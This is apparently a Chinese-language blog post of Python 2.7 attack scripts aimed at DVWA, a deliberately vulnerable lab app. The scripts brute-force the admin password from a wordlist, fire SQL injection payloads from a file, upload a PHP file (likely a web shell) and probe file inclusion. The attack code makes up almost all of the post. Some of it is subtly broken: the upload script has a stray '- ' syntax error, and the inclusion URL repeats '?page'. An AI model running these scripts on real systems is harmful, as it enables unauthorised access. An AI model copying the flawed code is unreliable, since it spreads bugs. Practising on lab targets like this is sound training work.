针对DVWA下的python脚本

首先是dvwa的搭建过程，这里我采用的是集成环境phpstudy进行本地搭建。利用下列脚本时需将dvwa的config.ini.php文件中的security改为low或者手动抓取low等级下的cookie。python版本为2.7

• 暴力破解 安全系数：low

  IP为本地IP，txt文件在相同目录下，可自行修改。

import httplib2
import sys



argc = len(sys.argv) - 1
argv = sys.argv[1:]
if argc == -1 or argc > 2:
    print "用法：python",sys.argv[0],"IP地址 端口号"
    print "例如：url为http://127.0.0.1:8080/，则IP地址应为127.0.0.1，端口号应为8080"
    sys.exit()

ip = "192.168.109.147"
port = "80"

if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]
	
h=httplib2.Http( )
url="http://"+ip+":"+port+"/vulnerabilities/brute/"
response,content=h.request(url)
cookie=response["Set-Cookie"]
header={"cookie":cookie}
filepasswords=open("dict.txt","r")
passwords=filepasswords.readlines()
for password in passwords:
    tmp=url+"?username=admin"+"&password="+password[:-1]+"&Login=Login"
    res,content=h.request(tmp,"GET","",header)
    print res["content-length"]+":"+"admin"+":"+password[:-1]+"\n"

• sql注入 安全系数：low

  IP为本地IP，txt文件在相同目录下，可自行修改。

import httplib2
import re
import urllib
import sys



argc = len(sys.argv) - 1
argv = sys.argv[1:]
if argc == -1 or argc > 2:
    print "用法：python",sys.argv[0],"IP地址 端口号"
    print "例如：url为http://127.0.0.1:8080/，则IP地址应为127.0.0.1，端口号应为8080"
    sys.exit()

ip = "192.168.109.147"
port = "80"

if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]
	
h=httplib2.Http()
file=open('test.txt','r')
tests=file.readlines()
url="http://"+ip+":"+port+"/vulnerabilities/sqli/"
response,content=h.request(url)
cookie=response["Set-Cookie"]
header={"cookie":cookie}
for test in tests:
    m=urllib.quote(test)
    n=m.replace('%20','+')
    tmp=url+"?id="+n[:-1]+"&Submit=Submit"
    res,content=h.request(tmp,"GET","",header)
    result=re.findall(r'<pre>(.*?)</pre>',content)
    print result
    print '\n'

• 文件上传 安全系数：low

  IP为本地IP,该脚本上传文件目录在D盘下，可自行修改。

import sys
import requests


argc = len(sys.argv) - 1
argv = sys.argv[1:]
if argc == -1 or argc > 2:
    print "用法：python",sys.argv[0],"IP地址 端口号"
    print "例如：url为http://127.0.0.1:8080/，则IP地址应为127.0.0.1，端口号应为8080"- 
    sys.exit()

ip = "192.168.109.147"
port = "80"

if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]
	
url="http://"+ip+":"+port+"/vulnerabilities/upload/"
data=None
files={'file':open(r'D:\php.php','rb')}
h=requests.post(url=url,data=data,files=files)
code=requests.get("http://"+ip+"/hackable/uploads/php.php").status_code
if code == 200:
    print "文件上传成功"
else:
    print "文件上传失败"

• 文件包含 安全系数：low

  IP为本地IP,txt文件在相同目录下，可自行修改。

import requests
import sys

argc = len(sys.argv) - 1
argv = sys.argv[1:]
if argc == -1 or argc > 2:
    print "用法：python",sys.argv[0],"IP地址 端口号"
    print "例如：url为http://127.0.0.1:8080/，则IP地址应为127.0.0.1，端口号应为8080"
    sys.exit()

ip = "192.168.109.147"
port = "80"

if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]

file=open('include.txt','r')
includes=file.readlines()
url="http://"+ip+":"+port+"/vulnerabilities/fi/?page"
for include in includes:
    tmp=url+"?page="+include[:-1]
    res=requests.get(tmp)
    if(res.status_code==200):
        print "exploit can be used"
    else:
        print "exploit can't be used"